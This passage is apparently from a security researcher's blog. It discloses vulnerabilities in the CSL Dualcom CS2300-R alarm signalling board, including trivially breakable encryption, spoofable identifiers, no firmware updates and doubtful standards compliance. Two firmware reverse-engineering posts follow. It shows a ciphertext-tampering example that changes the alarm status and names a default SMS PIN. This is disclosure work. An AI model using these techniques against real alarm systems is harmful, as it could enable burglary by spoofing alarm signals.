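key = [4, 3, 9, 8, 3, 7]
ciphertext = vigenere_encrypt("status", key)
assert recover_key("status", ciphertext) == key  # key fully recovered
```

With messages that contain predictable fields (ICCIDs, status codes), one intercepted message is enough.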

I cannot stress how bad this encryption is. Whoever developed it doesn’t even have basic knowledge of protocol design, never mind secure protocol design. I would expect this level of work from a short piece of A-level IT coursework, not a security company.

2. Weak protection from substitution

The CS2300-R boards use two pieces of information to identify themselves. One is the 20-digit ICCID – most people would know this as the number on a SIM card. The other is a 6-digit “chip number”.

ICCID on case

Both of these are sent in each message – the same message which we can easily decrypt. This leads to an attacker being able to easily determine the identification information, which could then be used to spoof messages from the device.

Beyond that, installers actually tweet images of the boards with either the ICCID or chip number clearly visible: 1, 2, 3.

This is a very weak form of substitution protection. There are many techniques which can be used to confirm that an embedded device is genuine without using information sent in the open, such as using a message authentication code or digital signature.
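As a rough sketch of one such technique – illustrative only, not something CSL implement, and with invented names – a keyed message authentication code means the shared secret never crosses the wire, and a spoofed or altered message fails verification:

```python
import hmac
import hashlib

# Hypothetical per-device secret, provisioned at manufacture
DEVICE_SECRET = b"example per-device secret"

def tag_message(message: bytes) -> bytes:
    # HMAC-SHA256 over the message using the shared secret
    return hmac.new(DEVICE_SECRET, message, hashlib.sha256).digest()

def verify(message: bytes, tag: bytes) -> bool:
    # Constant-time comparison to avoid timing side channels
    return hmac.compare_digest(tag_message(message), tag)

message = b"ICCID=894410...;CHIP=510021;STATUS=1566"
tag = tag_message(message)
assert verify(message, tag)
assert not verify(message.replace(b"1566", b"1570"), tag)
```

An attacker who sees the message and tag still cannot forge a new one without the secret.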

3. Unable to perform firmware updates over-the-air

It is both presumptuous and foolhardy to assume that the device you deploy on day one will be free of bugs and security issues.

This is why computers, phones, routers, thermostats, set-top boxes, and even cars, allow for firmware updates over-the-air. Deployed devices can be updated in the field, after bugs and vulnerabilities have been fixed.

It has been considered – for many years – that over-the-air firmware updates are an absolutely vital part of the security of any connected embedded system.

The CS2300-R boards examined have no capability for firmware update without visiting the board with a laptop and programmer. No installers that I questioned own a programmer. The alarm system needs to be put into engineering mode. The board needs to be removed from the alarm enclosure (and, most of the time it is held in with self-adhesive pads, making this awkward). The plastic cover needs to be removed. The programmer needs to be connected, and then the firmware updated. Imagine doing that for 100 boards, all at different sites.

Saleae Logic

At this point, we need to remember that CSL claim to have over 300,000 deployed boards.

If we imagine that it takes a low estimate of 5 minutes to update each of the 300,000 boards, that is 25,000 hours – over 1000 man-days of effort to deploy an update. If you use a more realistic time estimate, the amount of effort becomes scary.

This means that any issues found cannot and will not be fixed on deployed boards.

CSL have confirmed that none of their devices support over-the-air firmware updates.

CSL have given away the keys to the kingdom and cannot change the locks.

A software development life-cycle for a product that cannot be updated fosters a do-not-care attitude. Why should CSL care about vulnerabilities if they cannot fix them? What would be their strategy if a serious, remotely exploitable vulnerability was found?

4. I do not believe the CS2300-R boards are standards compliant

One of the standards governing alarm signalling equipment is EN50136. These are a series of lengthy documents that are unfortunately not open access.

Only a small part actually discusses encryption and integrity. Even when they are discussed, it is in loose terms.

CSL have stated, in reference to my report:

As with all our products, this product has been certified as compliant to the required European standard EN-50136

Unfortunately, CSL will not clarify which version of the standards the CS2300-R devices have been tested to.

I will quote the relevant section from EN50136-1-5:2008:

To achieve S1, S2, I1, I2 and I3 encryption and/or hashing techniques shall be used.

When symmetric encryption algorithms are used, key length shall be no less than 128 bits. When other algorithms are deployed, they shall provide similar level of cryptographical strength. Any hash functions used shall give a minimum of 256 bits output. Regular automatic key changes shall be used with machine generated randomized keys.

Hash functions and encryption algorithms used shall be publicly available and shall have passed peer review as suitable for this application.

These security measures apply to all data and management functions of the alarm transmission system including remote configuration, software/firmware changes of all alarm transmission equipment.

There are newer versions of the standard, but they are fundamentally the same.

My interpretation of this is as follows:

Cryptography algorithms used should be in the public domain and peer reviewed as suitable for this application.

We are talking DES, AES, RSA, SHA, MD5. Not an algorithm designed in-house by someone with little to no cryptographic knowledge. The cryptography used in the CS2300-R boards examined is unsuitable for use in any system, never mind this specific application.

When the algorithm was sent as a Python script to one cryptographer, they assumed I had sent the wrong file because it was so bad.

The next cryptographer I sent it to said:

I’ve never thought I’d see the day that someone wrote a variant on XOR encryption that offered less than 8 bits of security, but here we are.

We’re talking nanosecond scale brute force.

Key length should be 128 bits if a symmetric algorithm is used.

A reasonable interpretation of this requirement is that the encryption should provide strength equivalent to AES-128 from brute-force attacks. AES-128 will currently resist brute-force for longer than the universe has existed. This is strong enough.

The CSL algorithm is many orders of magnitude less secure than this. Given the fixed mapping table, a message can be decrypted in the order of nanoseconds.

Regular automatic key changes shall be used with machine generated randomised keys

Regular is obviously open to interpretation. There is a balance to be struck here. You need to change keys often enough that they cannot be brute-forced or uncovered. But key exchange is a risky process – keys can be sniffed and exchanges can fail (resulting in loss of communications).

Regardless, the CS2300-R boards have no facility at all for changing the keys. The key is in the firmware and can never change.

All data and management functions including remote configuration should be protected by the encryption detailed.

The CS2300-R has a documented SMS remote control system, protected by a 6-digit PIN. This is not symmetric encryption, this is not 128-bit, and this is not peer-reviewed.

This is a remote control system protected by a short PIN (and it seems that PIN is often the same – 001984 – and installers don’t have the ability to change it).
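To put the PIN in context, here is a quick back-of-the-envelope comparison of the keyspaces (my arithmetic, not CSL’s figures):

```python
# 6-digit PIN keyspace vs the 128-bit symmetric keyspace the standard asks for
pin_space = 10 ** 6          # 6-digit PIN: 000000-999999
aes128_space = 2 ** 128      # keyspace required by EN50136

print("PIN keyspace:     %d" % pin_space)
print("128-bit keyspace: %d" % aes128_space)
print("Ratio:            %.1e" % (aes128_space / pin_space))  # roughly 3.4e+32
```

A million combinations is nothing; it is around 32 orders of magnitude short of what the standard demands.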

Data should be protected from accidental or deliberate alteration

There is nothing in the protocol to protect against alteration. There is no MAC, no signature. Nothing. Not even a basic checksum or parity bit.

The message can easily be altered by accident or by malice. Look at this example:

   Status: 89441012345678901237A1234561111111111111117
Encrypted: 2i7MZCNhHRdkZpYTX2fiLMIaEbo02SKe5L3EbPYWRkn
    Shift: 0000000000000000000000000004444444444444440 
  Altered: 2i7MZCNhHRdkZpYTX2fiLMIaEbo46WOi9P7IfT20Von 
Decrypted: 89441012345678901237A1234565555555555555557

By adding four to a character in the encrypted text, we add four to the decrypted character. This means that the message content has been altered significantly, and very easily. The altered part of the message is the alarm status.
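This malleability is easy to demonstrate with a toy additive cipher (a mod-26 alphabet here, rather than CSL’s mapping): whatever you add to a ciphertext character is added to the plaintext character after decryption, and no key is needed to do it.

```python
def shift(ch, n):
    # Shift a lowercase letter by n positions (mod 26)
    return chr((ord(ch) - 97 + n) % 26 + 97)

key = 7
plain = "d"
cipher = shift(plain, key)            # sender encrypts: add the key
tampered = shift(cipher, 4)           # attacker adds 4 - no key required
decrypted = shift(tampered, -key)     # receiver decrypts: subtract the key
assert decrypted == shift(plain, 4)   # the plaintext moved by exactly 4
```

A MAC or even a simple checksum over the plaintext would make this tampering detectable.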

I can see no way that these units are compliant with this standard. CSL, however, say they are certified.

5. I do not believe third-party certification is worthwhile

CSL has obtained third-party certification for CS2300 units. When I first heard this, I was astonished – how is it compliant with the standard?

It’s still not actually clear which units have been tested. The certificate says CS2300, my units say CS2300-R, but CSL say that the units I have looked at have been tested.

After meeting with the test house I have an idea of what happened here.

The test house would not discuss the CS2300 certification specifically, due to client confidentiality. They did discuss the EN50136 standard and testing in general.

Firstly, I was not reassured that the test house has the technical ability to test any cryptographic or electronic security aspects of the standard. Their skills do not lie in this area. At a number of points during the meeting I was surprised about their lack of knowledge around cryptography.

Secondly, there are areas of standards where a manufacturer can self-declare that they are compliant. The test house expected, if another unit was to be tested, the sections on encryption and electronic security would be self-declared by the manufacturer. Note that the test house can still scrutinise evidence around a self-declaration.

Thirdly, there is no way for a third-party to see any detail around the testing without both the manufacturer and test house agreeing to release the data. To everyone else, it’s just a certificate.

From this, I can infer that the CS2300 – and probably other signalling devices, even from other manufacturers – have not actually had the encryption or other electronic security tested by a competent third-party.

I don’t feel that this is made clear enough by either manufacturers or test houses.

6. I do not think the standard is strict enough

I acknowledge that the standard must cover a range of devices, of different costs, protecting different risks, and across the EU. It must be a lot of work drawing up such a standard.

Regardless of this, the section on encryption and substitution protection is so wishy-washy that it would be entirely possible to build a compliant device that had gaping security holes in it.

Encryption, by itself, is not enough to maintain the security of a system. This is widely known in the information security and cryptography world. It’s perfectly possible to chain together sound cryptographic primitives into a useless system. There is nothing in the standard to protect against this.

7. CSL do not have a security culture

There are so many issues with the CS2300-R system it is almost unbelievable.

Other aspects of CSL’s information security are also similarly weak; leaking their customer database, no TLS on the first revision of their app, an awful apprenticeship website, no TLS on their own shop, misconfiguration of TLS on their VPN server, letting staff use Hotmail in their network operations centre… it goes on.

(It is worth noting that CSL added TLS to their shop and fixed the VPN server after I blogged about them a few weeks ago – why does it take blog posts before trivially simple issues are fixed?)

CSL do not have a vulnerability disclosure policy. It was clear that CSL did not know how to handle a vulnerability report.

CSL have refused to discuss any detail without a non-disclosure agreement in place.

There is no evidence that CSL’s security has undergone any form of scrutiny. Even a rudimentary half-day assessment would have picked up many of the issues with their website.

There is also a degree of spin in their marketing and sales. A number of installers and ARCs questioned believe that the device forms a VPN to CSL’s server. Some also believe that the device uses AES-256. Indeed, their director of IT, Santosh Chandorkar claimed to me that the CS2300-R formed a VPN with their servers. There is no evidence in the firmware to support any of these claims, but there is also no way for a normal user to confirm what is and isn’t happening.

At a meeting, Rob Evans implied that it would be my fault should these issues be exploited after I released them. He used the example of someone getting hurt on premises protected by their devices. It obviously would not be the fault of the company that developed the system.

At one point, when this was raised on a forum, someone claiming to be a family friend of Rob Evans accused me of hacking his DVR and spying on his kid, whilst at the same time attempting to track me down and making threats of violence. The same person has boasted about this on other forums.

I have asked Rob Evans to confirm or deny if he knows this person. As of today, I have had no response.

Another alarm installer going by the handle of Cubit is repeatedly stating that I am attempting to extort money from security manufacturers:

Not when he tries to hold a company to ransom, no!
Remember reading his article about the (claimed) flaws in the <redacted> product?? No, thought not. They paid to keep him quiet.

Oddly, the MD of the same company came along to state that this wasn’t the case.

I think it’s disturbing that, rather than pay attention to potential issues, defenders of CSL act like this.

And there is this gem from Simon Banks, managing director of CSL Dualcom:

IP requires elaborate encryption because it sends data across the open Internet. In my 25 years’ experience I’ve never been aware of a signalling substitution or ‘hack’, and have never seen the need for advanced 128 bit encryption when it comes to traditional security signalling.

No need for 128 bit encryption, Simon. Only the standard.


The seven issues to take away from this are:

  1. CSL have developed incredibly bad encryption, on a par with techniques that were state-of-the-art before computers existed.
  2. CSL have not protected against substitution very well
  3. CSL can’t fix issues when they are found because they can’t update the firmware
  4. There seems to be a big gap between the observed behaviour of the CS2300-R boards and the standards
  5. It’s likely that the test house didn’t actually test the encryption or electronic security
  6. Even if a device adheres to the standard, it could still be full of holes
  7. CSL either lack the skill or drive to develop secure systems, making mistake after mistake

What do I think should happen as a result of this?

  1. All signalling devices should be pen-tested by a competent third-party
  2. A cut-down report should be available to users of the devices, detailing what was tested and the results of the testing
  3. The standards, and the standards testing, need to include pen-testing rather than compliance testing
  4. The physical security market needs to catch up with the last 10 years of information security


CSL have made some statements about this.

This only impacts a limited number of units

CSL have stated:

Of the product type mentioned in his report there are only around 600 units in the field

What product type mentioned? Units labelled CS2300-R? Speaking to installers, the CS2300-R seems to be incredibly common.

If it is only a subset of units labelled CS2300-R, how does a user work out which ones are impacted?

The other 299,400 devices may not be the same unit, but how do they differ? Has a competent third-party tested the encryption and electronic security?

We have done an internal review

CSL have stated:

Our internal review of the report concluded there is no threat to these systems

Ask yourself this: if someone has deployed a system with this many issues in it, why should you trust their judgement as to the security of the system now? Are they competent to judge? There is no evidence that they are.

They have been third-party tested

CSL have stated, specifically in reference to my report:

As with all our products, this product has been certified as compliant to the required European standard EN-50136

This worries me. This says that the very device I have examined – the one full of security problems – got past EN-50136 testing. If this device can pass, practically anything can pass.

But I am fairly sure that the standards testing essentially allows the manufacturer to complete the exercise on paper alone.

The devices are old

The product tested was a 6 year old GPRS/IP Dualpath signalling

Firstly, there are at least 600 of these still in service.

Secondly, when the research was carried out, the boards were 4.5 years old.

Thirdly, does that mean that a 6 year old product is obsolete? Does that mean they don’t support it any more?

The threat model isn’t the one we are designed for

This testing was conducted in a lab environment that isn’t
representative of the threat model the product is designed to be implemented in
line with.  The Dualpath signalling unit is designed to be used as part of a
physically secured environment with threat actors that would not be targeting
the device but the assets of the device End User.

This seems to have been a sticking point with some of the more backwards members of the security industry as well.

The reverse engineering work was done in a lab. As with nearly all vulnerability research, there needs to be a large initial investment in time and effort. Once vulnerabilities have been found, they can be exploited outside of the lab environment.

If the threat actors aren’t targeting the device, why bother with dual path?

Again, it doesn’t look like the devices comply with the standards. This is what counts.

They aren’t remotely exploitable

No vulnerabilities were identified that could be exploited remotely via
either the PSTN connectivity or GPRS connection which significantly reduces the
impact of the vulnerabilities identified.

I disagree with this. CSL and a number of their supporters do not seem to want to accept that GPRS data can no longer be classed as secure.

This still leaves the gaping holes on the IP side. When I met CSL at IFSEC 2014, they strongly implied that the number of IP units they sold was negligible. There seem to be more than a few getting installed though.

The price point is too low

The price point for the DualCom unit is £200 / $350.  CSL DualCom also
have devices in their portfolio that are tamper resistant or tamper evident to
enable customers to defend against more advanced or better funded threat
actors.  Customers are then able to spend on defence in line with the value of
their assets.

I’m not sure why the price is relevant. Are CSL saying it’s too cheap to be properly secure?

I can’t find any of these tamper resistant or tamper evident devices for sale – it would be interesting to see what they are.

Very few of the issues raised involve physically tampering with the device. They are generally installed in a protected area.

These aren’t problems, but we are releasing a product that fixes the issues

If customers are concerned about the impact of these vulnerabilities CSL are
releasing a new product in May which addresses all of the areas highlighted.

So on one hand, these vulnerabilities aren’t issues, but they are issues enough that you’ve developed a new product to fix them? Righty ho.

Firmware updates are vulnerable, but not normal communications

CSL products are not remotely patchable as we believe over the air updates
could be susceptible to compromise by the very threat actors we are defending


Just a few paragraphs ago, you say that you are not protecting against the kind of threat actor that can carry out attacks as in the report. But you are protecting against a threat actor that can intercept firmware updates?

Why allow critical settings to be changed over SMS if this is an issue?

What-if rebuttals

These are things that haven’t been directly stated by CSL or others, but I suspect people will raise them.

These issues are not being exploited

During discussions with CSL, they seemed very focused on what has happened in the past. I had no evidence of attacks being carried out against their system, and neither did they. Therefore, in their eyes, the vulnerabilities were not an issue.

This is an incredibly backwards view of security. The idea of a botnet of DVRs mining cryptocurrency would have seemed ridiculous 5 years ago. The idea of a worm, infecting routers and fixing security problems even more so. The Internet changes. The attackers change. Knowledge changes.

Failing to keep up with these changes has been the downfall of many systems.

But we haven’t detected any issues

This entirely misses the point.

The end result of these vulnerabilities is that it is highly likely that a skilled attacker could spoof another device undetected.

We don’t mind issues being brought to us privately

These issues were brought to CSL’s attention, privately, 17 months ago.

That is ample time to act.

He works for a competitor

Firstly, I don’t. I have spoken to competitors to find out how they work.

Secondly, this would not detract from the glaring holes in the system.

He is blackmailing people in the security industry

I have released vulnerabilities in Visonic and Risco products. Shortly, there will be a vulnerability released in the RSI Videofied systems. None of these companies have been asked for payment, and all have been given 45+ days to respond to the issues. This is a fair way of disclosing issues.

I do paid work with others in the security industry. Again, at no point has payment been requested to keep issues quiet.

I have never asked CSL for payment. At several points they have asked to work with me, which I have turned down as I don’t think their security problems are going to be resolved given their culture.

The encryption and electronic security are adequate

It’s hard to explain (to someone outside of infosec) just how bad the encryption is. It is orders of magnitude weaker than the encryption used by Netscape Navigator in 2001.

The problems found have been widely known for 20+ years, and many are easy to protect against. Importantly, it appears that their competitors – at least WebWayOne and BT Redcare – aren’t making the same mistakes.

The GPRS network is secure

This was true 15 years ago. It is now possible – cheaply and easily – to spoof a cell site and then intercept GPRS communications. You cannot rely on the security of the GPRS network alone.

Further to this, exactly the same protocol is used over the Internet.

But above all, the standards don’t differentiate between GPRS and the Internet – they are both packet switched networks and must be secured similarly.

We take our customers’ security seriously

So does every other company that has been the subject of criticism around security.

I would argue that letting your customer database leak is not taking security seriously.

Reverse engineering a CSL Dualcom GPRS part 16 – SMS remote commands

Sorry for the slow-down in posts – I stored up a load of posts, then posted them too quickly.

Since the last post, I have identified a lot of functionality in the code, including:

  • TX/RX subs for all the UARTs
  • Locations of TX/RX buffers for all UARTs
  • Multiply, divide, modulus and exponent subs
  • Conversion subs (ASCII->hex etc.)
  • EEPROM read/write subs
  • 7-segment display subs
  • Buzzer subs
  • Reading button state
  • Memory copy, search etc.
  • Hardware initialisation
  • Two interesting subs that are called frequently to move working memory onto the stack and back again

The board supports several GPRS modems – the Wavecom GR64 on the boards I have, but also Cinterion and Telit. The AT command set between the modems is completely different, so there are often several sections of code for common functionality like “Activate PDP context”. I’ve only looked at the Wavecom parts.

Having all this has given me enough to tie observed behaviour (just from using the Dualcom board, and the logic traces) back to specific areas of the code. Seeing the strings on the UART and searching for the address where that string is stored in flash/EEPROM is very useful.

I’m fairly sure the code is compiled C from IAR Embedded Workbench – the multiply, divide and startup are identical. If I compile code from Renesas Cubesuite, it looks very different.

There is still a lot of code that looks like assembly though – some of the memory operations, calling convention, and string searching look very odd to be compiled C.

One thing that caught my eye during the serial trace was that the board repeatedly checks for SMS messages. This suggests it is waiting for something to arrive, possibly commands.

Digging around a bit, in the manual for the Dualcom GSM (not the GPRS), it mentions SMS remote control – sending commands to the CSL Dualcom:

SMS Remote commands


This is interesting. A 6 digit PIN and some limited commands. It wouldn’t be the first time that PINs are defaulted to a certain value or derived from open information like the ICCID or number. It also wouldn’t be the first time that there are undocumented or hidden commands for a device, or even a backdoor.

We’re going to need to have a dig about in the code to see how these commands are dealt with. A good starting point would be to find where the string AT+CMGR (read text messages) is used, and follow on from there.

AT+CMGR is stored in the flash at 0x1BE6 (0x1000-0x2000 is almost exclusively strings and lookup tables). If we search for this address, we find the following chunk:

// State 0x86
// Request text messages
0c657        afc8f5      MOVW            AX,!0F5C8H // This is used as a time out
0c65a        7c80        XOR             A,#80H
0c65c        440180      CMPW            AX,#8001H
0c65f        dc07        BC              $0C668H
	0c661        d46a        CMP0            0FFE6AH
	0c663        61f8        SKNZ            
	0c665        ee3902      BR              $!0C8A1H
0c668        e1          ONEB            A
0c669        fc64d700    CALL            sub_Serial_ResetBuffers
0c66d        32b61e      MOVW            BC,#1EB6H // AT+CMGR=
0c670        e1          ONEB            A
0c671        fcd1e100    CALL            sub_Serial_WriteString_e1d1
0c675        8f49f7      MOV             A,!0F749H
0c678        72          MOV             C,A
0c679        f3          CLRB            B
0c67a        e1          ONEB            A
0c67b        fc04e200    CALL            sub_Serial_WriteHexAsDec_e204
0c67f        f46b        CLRB            0FFE6BH
0c681        f46a        CLRB            0FFE6AH
0c683        cf41f704    MOV             !0F741H,#4H
0c687        530d        MOV             B,#0DH //CR
0c689        e1          ONEB            A
0c68a        fcb2e100    CALL            sub_Serial_WriteChar_e1b3
0c68e        30a302      MOVW            AX,#2A3H
0c691        bfc8f5      MOVW            !0F5C8H,AX // set timeout to 675
0c694        cf4af704    MOV             !0F74AH,#4H // State 4 next
0c698        ee0602      BR              $!0C8A1H

This is a massive state machine. The “state” is stored in 0xF74A, checked at the beginning of the sub, and then a branch is performed to the current state. State 0x86 sends “AT+CMGR=1” to UART1. It then sets the next state to 0x4.

Each of the states sets a counter in 0xF5C8, which is decremented in the timer interrupt. If this timeout expires, the state machine seems to be reset in most cases.
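The dispatch-plus-timeout structure inferred above can be sketched in C. This is my own reconstruction, not the firmware's code – the variable and function names are placeholders for the addresses seen in the disassembly (0xF74A, 0xF5C8 and so on).

```c
#include <stdint.h>

/* Sketch of the state machine structure, assuming: the state byte lives
   at 0xF74A, the timeout counter at 0xF5C8 (decremented elsewhere in the
   timer interrupt), and entering a state re-arms the timeout. */

static uint8_t  state   = 0x86;   /* stand-in for 0xF74A */
static uint16_t timeout = 0x2A3;  /* stand-in for 0xF5C8; 0x2A3 = 675 ticks */

static void enter_state(uint8_t next, uint16_t ticks)
{
    state   = next;
    timeout = ticks;
}

static void state_machine_tick(void)
{
    if (timeout == 0) {           /* timed out: reset the machine */
        enter_state(0x96, 0x2A3);
        return;
    }
    switch (state) {
    case 0x86:                    /* send "AT+CMGR=1" and await reply */
        /* uart1_write("AT+CMGR=1\r"); */
        enter_state(0x04, 0x2A3);
        break;
    case 0x04:                    /* parse the reply - see the listing below */
        break;
    default:
        break;
    }
}
```

The state numbers here are from the disassembly; everything else is illustrative.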

// State 0x4
// State after requesting text messages
0c69b        afc8f5      MOVW            AX,!0F5C8H // timeout
0c69e        7c80        XOR             A,#80H
0c6a0        440180      CMPW            AX,#8001H
0c6a3        dc42        BC              $0C6E7H
	0c6a5        8f19f7      MOV             A,!0F719H
	0c6a8        4c02        CMP             A,#2H
	0c6aa        61d8        SKNC            
	0c6ac        eef201      BR              $!0C8A1H
	0c6af        32c01e      MOVW            BC,#1EC0H  // "REC "
	0c6b2        e1          ONEB            A
	0c6b3        fcd3de00    CALL            sub_Serial_FindInRX_ded3
	0c6b7        d1          CMP0            A
	0c6b8        dd0d        BZ              $0C6C7H
	0c6ba        30a302      MOVW            AX,#2A3H
	0c6bd        bfc8f5      MOVW            !0F5C8H,AX
	0c6c0        cf4af718    MOV             !0F74AH,#18H // State 0x18 next
	0c6c4        eeda01      BR              $!0C8A1H

	0c6c7        32c61e      MOVW            BC,#1EC6H // "STO "
	0c6ca        e1          ONEB            A
	0c6cb        fcd3de00    CALL            sub_Serial_FindInRX_ded3
	0c6cf        d1          CMP0            A
	0c6d0        dd07        BZ              $0C6D9H
	0c6d2        cf4af717    MOV             !0F74AH,#17H // State 0x17 next
	0c6d6        eec801      BR              $!0C8A1H

	0c6d9        3152410a    BT              0FFE41H.5H,$0C6E7H
	0c6dd        afdef5      MOVW            AX,!0F5DEH
	0c6e0        7c80        XOR             A,#80H
	0c6e2        440180      CMPW            AX,#8001H
	0c6e5        dc0b        BC              $0C6F2H
0c6e7        cf49f70f    MOV             !0F749H,#0FH
0c6eb        cf4af796    MOV             !0F74AH,#96H // State 0x96 next
0c6ef        eeaf01      BR              $!0C8A1H

State 0x4 searches the receive buffer on UART1 for the characters “REC” or “STO”. “REC” is what we would see if there was a text message to read, and if it is found we move to state 0x18. This calls 0xC301 and the flow continues from there. It might be better to describe this as a process rather than show the ASM.

The format of the text message received would be as follows:

+CMGR: “REC UNREAD”,“+447747008670”,“Matt L”,“02/11/19,09:57:28+00”,145,36,0,0,“ +447785016005”,145,8

Test sms

The code, give or take, works as follows.

1. Search RX buffer for string READ – this finds REC UNREAD and REC READ, both found in text messages. If not found, abort.

2. Keep on going until a + is found – the start of the phone number

3. Loop until a non-numeric character is found, storing the number in 0xFE17F. The number is used later to send a text back.

4. Loop until a carriage return is found. This is the end of the text detail and the start of the actual text.

5. Copy the message to address 0xFE20E.

6. Read in a 6-digit PIN from EEPROM at 0x724. I can’t see where this is set in the Windows utility.

7. Check that the 6-digit PIN is at the beginning of the message.

8. Call a function to parse the rest of the message and act on it.
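The eight steps above can be sketched as a single C function. To be clear, this is my own summary of the flow, not the firmware's code – the function name, buffer handling and return convention are all assumptions; the PIN would come from EEPROM offset 0x724.

```c
#include <string.h>
#include <ctype.h>

/* Sketch of the message handling described above. Returns a pointer to
   the command text after the PIN, or NULL if any step fails. The sender's
   number (stored at 0xFE17F in the firmware) is copied into `number`. */
static const char *parse_cmgr_reply(const char *rx, const char *pin,
                                    char *number, size_t numlen)
{
    const char *p = strstr(rx, "READ");      /* 1: matches REC UNREAD / REC READ */
    if (!p) return NULL;
    while (*p && *p != '+') p++;             /* 2: find start of phone number */
    if (!*p) return NULL;
    p++;
    size_t i = 0;
    while (isdigit((unsigned char)*p) && i + 1 < numlen)
        number[i++] = *p++;                  /* 3: store digits until non-numeric */
    number[i] = '\0';
    while (*p && *p != '\r') p++;            /* 4: skip to end of the header line */
    if (!*p) return NULL;
    p++;
    if (*p == '\n') p++;                     /* 5: message body starts here */
    size_t plen = strlen(pin);
    if (strncmp(p, pin, plen) != 0)          /* 6/7: 6-digit PIN must prefix it */
        return NULL;
    return p + plen;                         /* 8: rest is parsed as a command */
}
```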

This is where it gets mildly interesting – not only are the documented commands present, but there are also ones that include “CALL” and “4 2 xxxxxxxxxx”…

Reverse engineering a CSL Dualcom GPRS part 15 – interpreting disassembly 2

In addition to finding the most frequently called functions, we should go through the memory map and identify the important parts of it.

1154 memory map

One part of this that is very important to how the device operates is the vector table, right at the bottom of the flash.

The vector table contains addresses that are called when certain interrupts are triggered. For these microcontrollers, this is structured like this:
Vector table

So we take a look right at the beginning of the disassembly:

00000        00          NOP             
00001        01          ADDW            AX,AX
00002        82          INC             C
00003        2084        SUBW            SP,#84H
00005        2086        SUBW            SP,#86H
00007        2088        SUBW            SP,#88H
00009        208a        SUBW            SP,#8AH
0000b        208c        SUBW            SP,#8CH
0000d        208e        SUBW            SP,#8EH
0000f        2090        SUBW            SP,#90H
00011        2092        SUBW            SP,#92H
00013        2001        SUBW            SP,#1H
00015        247d23      SUBW            AX,#237DH
00018        292494      MOV             A,9424H[C]
0001b        2096        SUBW            SP,#96H
0001d        203a        SUBW            SP,#3AH
0001f        21          ?               
00020        be20        MOVW            PM0,AX
00022        3c21        SUBC            A,#21H
00024        92          DEC             C
00025        225921      SUBW            AX,!2159H
00028        ba22        MOVW            [DE+22H],AX
0002a        9820        MOV             [SP+20H],A
0002c        00          NOP             
0002d        209a        SUBW            SP,#9AH
0002f        209c        SUBW            SP,#9CH
00031        209e        SUBW            SP,#9EH
00033        20a0        SUBW            SP,#0A0H
00035        20a2        SUBW            SP,#0A2H
00037        20a4        SUBW            SP,#0A4H
00039        20a6        SUBW            SP,#0A6H
0003b        205e        SUBW            SP,#5EH
0003d        23          SUBW            AX,BC
0003e        d7          RET             
0003f        226023      SUBW            AX,!2360H
00042        a820        MOVW            AX,[SP+20H]
00044        aa20        MOVW            AX,[DE+20H]
00046        ac20        MOVW            AX,[HL+20H]
00048        ae20        MOVW            AX,PM0
0004a        b020b2      DEC             !0B220H
0004d        20b4        SUBW            SP,#0B4H
0004f        20b6        SUBW            SP,#0B6H
00051        20b8        SUBW            SP,#0B8H
00053        20ba        SUBW            SP,#0BAH
00055        20ff        SUBW            SP,#0FFH

The disassembler has tried to disassemble data as code – a common issue. Though, to be honest, it should know that this area is a vector table.

So if we re-organise the hex file into something a bit more readable, we get this:

0000 -> 0100 * RESET
0004 -> 2082
0006 -> 2086
0008 -> 2088
000A -> 208A
000C -> 208C
000E -> 208E
0010 -> 2090
0012 -> 2092
0014 -> 2401 * INTST3
0016 -> 237D * INTSR3
0018 -> 2429 * INTSRE3
001A -> 2094 
001C -> 2096 
001E -> 213A * INST0 
0020 -> 20BE * INTSR0 
0022 -> 213C * INTSRE0
0024 -> 2292 * INTST1
0026 -> 2159 * INTSR1
0028 -> 22BA * INTSRE1
002A -> 2098
002C -> 2000 * INTTM00
002E -> 209A
0030 -> 209C
0032 -> 209E
0034 -> 20A0
0036 -> 20A2
0038 -> 20A4
003A -> 20A6
003C -> 235E * INTST2
003E -> 22D7 * INTSR2
0040 -> 2360 * INTSRE2
0042 -> 20A8
0044 -> 20AA
0046 -> 20AC
0048 -> 20AE
004A -> 20B0
004C -> 20B2
004E -> 20B4
0050 -> 20B6
0052 -> 20B8
0054 -> 20BA

Notice how a lot of the addresses are just incrementing – 20AA, 20AC, 20AE. These all point into a massive block of RETI instructions – i.e. the interrupt handler returns immediately; it is not implemented.

02092        61fc        RETI            
02094        61fc        RETI            
02096        61fc        RETI            
02098        61fc        RETI            
0209a        61fc        RETI            
0209c        61fc        RETI            
0209e        61fc        RETI            
020a0        61fc        RETI            
020a2        61fc        RETI            
020a4        61fc        RETI            
020a6        61fc        RETI            
020a8        61fc        RETI            
020aa        61fc        RETI            
020ac        61fc        RETI            
020ae        61fc        RETI            
020b0        61fc        RETI            
020b2        61fc        RETI     

All of the vectors that are marked with an asterisk and with a name are implemented or used by the board. There are some important handlers here – mainly the serial IO.

Reset jumps to 0x100. I’ll save looking at that for another time – mostly the reset code will be setting up buffers, memory and pointers, and performing some checks.

You can also see we have groups of interrupt handlers for INTST* (transmit finished), INTSR* (receive finished), INTSRE* (receive error). These are for UARTs 0–3 respectively. Their implementations are very similar – let’s look at UART1, which is used for the GPRS modem.

	02292        c1          PUSH            AX
	02293        c3          PUSH            BC
	02294        c7          PUSH            HL
		02295        fbb6e0      MOVW            HL,!0E0B6H
		02298        afb4e0      MOVW            AX,!0E0B4H
		0229b        47          CMPW            AX,HL
		0229c        dd17        BZ              $22B5H
		0229e        dbb4e0      MOVW            BC,!0E0B4H
		022a1        49b8e4      MOV             A,0E4B8H[BC] 	// Get data from E4B8 using offset from E0B4
		022a4        9e44        MOV             SIO10,A 		// Move to serial data TX register
		022a6        a2b4e0      INCW            !0E0B4H	    // Increment the offset
		022a9        afb4e0      MOVW            AX,!0E0B4H
		022ac        440a04      CMPW            AX,#40AH 		// Is the offset greater than 1034? If so reset to 0
		022af        dc04        BC              $22B5H
		022b1        f6          CLRW            AX
		022b2        bfb4e0      MOVW            !0E0B4H,AX
	022b5        c6          POP             HL
	022b6        c2          POP             BC
	022b7        c0          POP             AX
	022b8        61fc        RETI  

Again – I’m not really currently interested in precise detail, just an idea of what is happening. This handler takes a byte from a buffer at 0xE4B8 and writes it into the transmit register. That buffer will appear elsewhere in the code and hint to us when something is being sent out of UART1.
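The ring-buffer logic in that handler can be expressed in a few lines of C. This is a sketch of what the disassembly appears to do – the buffer size of 0x40A and the addresses are from the listing; the C names are mine.

```c
#include <stdint.h>

/* Sketch of the INTST1 handler: on each transmit-complete interrupt,
   take the next byte from a ring buffer and write it to the UART1
   TX register, wrapping the read offset at 0x40A (1034). */
#define TXBUF_SIZE 0x40A          /* matches CMPW AX,#40AH in the listing */

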